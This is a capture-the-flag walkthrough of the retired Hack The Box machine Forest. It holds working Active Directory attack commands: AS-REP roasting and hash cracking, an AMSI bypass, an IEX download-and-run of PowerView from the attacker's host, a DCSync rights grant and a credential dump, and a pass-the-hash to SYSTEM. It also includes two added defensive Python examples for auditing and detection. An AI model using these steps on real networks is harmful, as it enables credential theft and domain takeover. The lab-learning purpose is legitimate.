HTB Walkthrough: Forest w/o Metasploit (retired)

Shraddha M.
6 min read · May 24, 2021

Forest is a retired box on HTB and is part of TJ Null's list of OSCP-like boxes.

Hostname: Forest | Difficulty Level: Easy | Operating System: Windows

NMAP Scan

┌──(root💀kali)-[/home/kali/labs/HTB/Forest]
└─# nmap -sC -sV -oA Forest 10.10.10.161
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 20:35 EDT
Nmap scan report for 10.10.10.161
Host is up (0.021s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-14 00:58:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h41m59s, deviation: 4h02m30s, median: 21m58s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2021-05-13T17:58:16-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-14T00:58:15
|_ start_date: 2021-05-14T00:55:47

Since LDAP is exposed on ports 389 and 3268 (and the scan shows anonymous binds are worth trying), let us enumerate users.

Enumeration

┌──(root💀kali)-[/home/kali/labs/HTB/Forest]
└─# ldapsearch -h 10.10.10.161 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#

#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

Getting the user names from ldapsearch (anonymous bind, filtering on person objects and keeping only the sAMAccountName values):
┌──(root💀kali)-[/home/kali/labs/HTB/Forest]
└─# ldapsearch -h 10.10.10.161 -x -b "DC=htb,DC=local" '(objectClass=Person)' sAMAccountName | grep sAMAccountName | awk '{print $2}' > userlist.txt

Exploitation

┌──(root💀kali)-[/home/kali/labs/HTB/Forest]
└─# /home/kali/impacket/build/scripts-3.8/GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/' -format hashcat

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Name MemberOf PasswordLastSet LastLogon UAC
--------------------------------------------------------------------------------------------------------------
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2021-05-14 15:58:23.745672 2021-05-14 15:59:48.136463 0x410200

$krb5asrep$23$svc-alfresco@HTB.LOCAL:5b0f002a13e822cd088b0b9c3e707c71$57105e637ea29ceafac961dd781f17b36f23a72a89945cf9e7b3a089addb6b92a7aa930afe7cccf93d89438127bb86463b9fecff2a1f03500c3e1bf9b00594baab2daf011f14b25fc493191e215448c35d7cded410707a9dee2667b1b7da1575d8f3ab4b7a8c1c5ec5743ee3f0ad3c8fa729877ec214cb8780cfa71f8a097580b4f6ad0e5203efc2cd5a7dea7cda6e0755dd042561979941862bda3ad471d5262d8705bf570fc87f3d6326c49760a33e847ebdd58ce019b1551fc724b2c597b439badaca115f8106b3e6967774c7003d936ee35f31fd9f31b5b6a3accce3866e203ccafc62a7
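GetNPUsers only returned svc-alfresco because its userAccountControl value, 0x410200, has the "do not require Kerberos pre-authentication" bit set. The following is an added example (not code from the original post) that decodes that value, reports which accounts in a constructed list a defender should fix, and reads the etype off the hashcat-format line above; only svc-alfresco's UAC value and hash header come from the page.

```python
# Added example (not from the original post): decode the UAC value that
# GetNPUsers printed for svc-alfresco (0x410200), show why the account was
# AS-REP-roastable, and run the same check over a constructed account list.
import re

# Bit values from Microsoft's userAccountControl documentation.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

def decode_uac(value: int) -> set:
    """Names of the flags set in a userAccountControl value."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}

def asrep_roastable(uac: int) -> bool:
    """Enabled account with pre-auth disabled: the KDC returns an AS-REP
    encrypted with the user's key to anyone who asks, so it can be cracked
    offline. Fix: Set-ADAccountControl <user> -DoesNotRequirePreAuth $false."""
    flags = decode_uac(uac)
    return "DONT_REQ_PREAUTH" in flags and "ACCOUNTDISABLE" not in flags

def parse_asrep_header(hash_line: str):
    """Pull (user, realm, etype) off a hashcat-format $krb5asrep$ line.
    etype 23 is RC4-HMAC, which cracks far faster than AES (17/18)."""
    m = re.match(r"\$krb5asrep\$(\d+)\$([^@]+)@([^:]+):", hash_line)
    if not m:
        raise ValueError("not a $krb5asrep$ hash line")
    return m.group(2), m.group(3), int(m.group(1))

# Constructed sample: only svc-alfresco's UAC value comes from the page.
SAMPLE_ACCOUNTS = {
    "svc-alfresco": 0x410200,
    "sebastien": 0x10200,   # constructed: normal account, password never expires
    "old-svc": 0x410202,    # constructed: pre-auth off but account disabled
}

def audit(accounts: dict) -> list:
    """Account names a defender should fix (enabled and pre-auth disabled)."""
    return sorted(name for name, uac in accounts.items() if asrep_roastable(uac))

if __name__ == "__main__":
    print(sorted(decode_uac(0x410200)))  # ['DONT_EXPIRE_PASSWORD', 'DONT_REQ_PREAUTH', 'NORMAL_ACCOUNT']
    print(audit(SAMPLE_ACCOUNTS))         # ['svc-alfresco']
```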

Cracking the AS-REP hash offline with John. (This is AS-REP roasting rather than Kerberoasting: the hash came from an account that does not require Kerberos pre-authentication, which is exactly what GetNPUsers looks for.)

┌──(root💀kali)-[/home/kali/labs/HTB/Forest]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:14 DONE (2021-05-15 12:37) 0.07122g/s 291008p/s 291008c/s 291008C/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Or crack the hash with hashcat (mode 18200 is Kerberos 5 AS-REP etype 23):
kali@kali:~/OSCP/HTB/Forest$ hashcat --force -m 18200 svchash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule

Either way, the password is s3rvice for user svc-alfresco.

Get a shell over WinRM (port 5985 was outside the default nmap port range, but the account is allowed to log in remotely) and find user.txt:
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -u svc-alfresco -p s3rvice -i 10.10.10.161

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

Privilege Escalation

Let us use BloodHound to enumerate Active Directory. Transfer SharpHound.exe (found in the BloodHound project's Collectors directory; git clone the BloodHound project to get it) to the target machine and run it.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ./SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir

Directory: C:\Users\svc-alfresco\Desktop

Use the link below for BloodHound setup on Kali:
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux

Once BloodHound is set up, let us enumerate the victim domain. Transfer the zip file SharpHound generated to the Kali machine and upload it through the BloodHound UI.

Data visualisation in BloodHound: search for the account 'svc-alfresco', right-click it and choose 'Mark User as Owned'.

Click on ‘Find Shortest Paths to Domain Admins’

svc-alfresco is a member of 'Service Accounts', which is nested in 'Privileged IT Accounts', which in turn is nested in 'Account Operators'. Account Operators can create domain users, and it also holds 'GenericAll' over the 'Exchange Windows Permissions' group, which holds 'WriteDacl' on the domain object.

Because 'Account Operators' has 'GenericAll' on 'Exchange Windows Permissions', svc-alfresco can add members to that group. 'WriteDacl' on the domain then lets a member of that group edit the domain's access control list and grant a principal the replication rights needed for DCSync.

Let us implement these steps.

a) Creating a new user:
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user sarah OSCP2021 /add /domain
The command completed successfully.

b) Adding 'sarah' to 'Exchange Windows Permissions' (and to 'Remote Management Users' so she can also use WinRM):
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net group "Exchange Windows Permissions" /add sarah
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net localgroup "Remote Management Users" sarah /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> menu


[+] Bypass-4MSI
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Bypass-4MSI
[+] Patched! :D

c) Granting DCSync rights:

For the exact commands, right-click the 'WriteDacl' edge in the BloodHound graph and select 'Help' (the 'Abuse Info' tab).

Getting PowerView from GitHub on Kali (the raw file, not the HTML page):
┌──(root💀kali)-[/home/kali/labs/HTB/Forest]
└─# wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

Serving the file from Kali (for example with python3 -m http.server 8000 in the same directory) and loading it in memory on the target:
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> IEX(New-Object Net.WebClient).downloadString('http://<Kali IP>:8000/PowerView.ps1')

Performing the steps from BloodHound's 'Abuse Info' for the WriteDacl edge:
i) $pass = ConvertTo-SecureString 'OSCP2021' -AsPlainText -Force
ii) $cred = New-Object System.Management.Automation.PSCredential('htb\sarah', $pass)
iii) Add-ObjectAcl -PrincipalIdentity sarah -Credential $cred -TargetIdentity "DC=htb,DC=local" -Rights DCSync

d) Abusing DCSync to dump the domain hashes:
┌──(root💀kali)-[~]
└─# python3 /home/kali/labs/HTB/opt/impacket-0.9.22/examples/secretsdump.py htb/sarah@10.10.10.161
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

[*] Cleaning up...

┌──(root💀kali)-[~]
└─# python3 /home/kali/labs/HTB/opt/impacket-0.9.22/examples/psexec.py administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Passing the Administrator NT hash with psexec.py gives a SYSTEM shell on the domain controller and the root flag.
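Each of steps a) to d) above leaves a distinct Windows Security log footprint: 4720 for the user creation, 4728/4732/4756 for the group additions, 5136 for the DACL rewrite on the domain object (needs Directory Service Changes auditing), and 4662 carrying the DS-Replication control-access GUIDs for the DCSync itself. The following is an added example (not part of the original walkthrough) that flags that chain over constructed sample events; field names follow the Security log EventData names, the group and account names come from this box, and the 4662 Properties field is simplified to a list of GUIDs.

```python
# Added example (not from the original post): flag the log footprint of the
# escalation chain walked above, run over constructed sample events.

# Control-access-right GUIDs a DCSync needs; they appear in the Properties
# field of event 4662 when object access auditing covers the domain head.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# Groups from this box's attack path; extend with whatever is privileged in your domain.
WATCHED_GROUPS = {"account operators", "exchange windows permissions", "remote management users"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}  # member added to global / domain-local / universal security group

def detect(events, dc_accounts=frozenset({"FOREST$"})):
    """Return (subject, reason) findings. dc_accounts: computer accounts allowed to replicate."""
    findings = []
    for e in events:
        eid, who = e.get("EventID"), e.get("SubjectUserName", "")
        if eid == 4720:
            findings.append((who, "created account " + e.get("TargetUserName", "?")))
        elif eid in GROUP_ADD_EVENTS and e.get("TargetUserName", "").lower() in WATCHED_GROUPS:
            findings.append((who, "added %s to %s" % (e.get("MemberName", "?"), e["TargetUserName"])))
        elif (eid == 5136 and e.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"
              and e.get("ObjectDN", "").upper().startswith("DC=")):
            findings.append((who, "rewrote the DACL of " + e["ObjectDN"]))
        elif eid == 4662 and who not in dc_accounts and REPL_GUIDS & set(e.get("Properties", [])):
            findings.append((who, "exercised replication rights from a non-DC account (DCSync)"))
    return findings

# Constructed sample events mirroring steps a) to d); names come from the walkthrough.
SAMPLE_EVENTS = [
    {"EventID": 4720, "SubjectUserName": "svc-alfresco", "TargetUserName": "sarah"},
    {"EventID": 4756, "SubjectUserName": "svc-alfresco", "TargetUserName": "Exchange Windows Permissions",
     "MemberName": "CN=sarah,CN=Users,DC=htb,DC=local"},
    {"EventID": 4732, "SubjectUserName": "svc-alfresco", "TargetUserName": "Remote Management Users",
     "MemberName": "CN=sarah,CN=Users,DC=htb,DC=local"},
    {"EventID": 5136, "SubjectUserName": "sarah", "ObjectDN": "DC=htb,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "SubjectUserName": "sarah", "Properties": list(REPL_GUIDS)},
    {"EventID": 4662, "SubjectUserName": "FOREST$",  # normal DC-to-DC replication, not flagged
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"EventID": 4728, "SubjectUserName": "Administrator", "TargetUserName": "Marketing",  # benign
     "MemberName": "CN=bob,CN=Users,DC=htb,DC=local"},
]

if __name__ == "__main__":
    for subject, reason in detect(SAMPLE_EVENTS):
        print(f"{subject}: {reason}")
```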
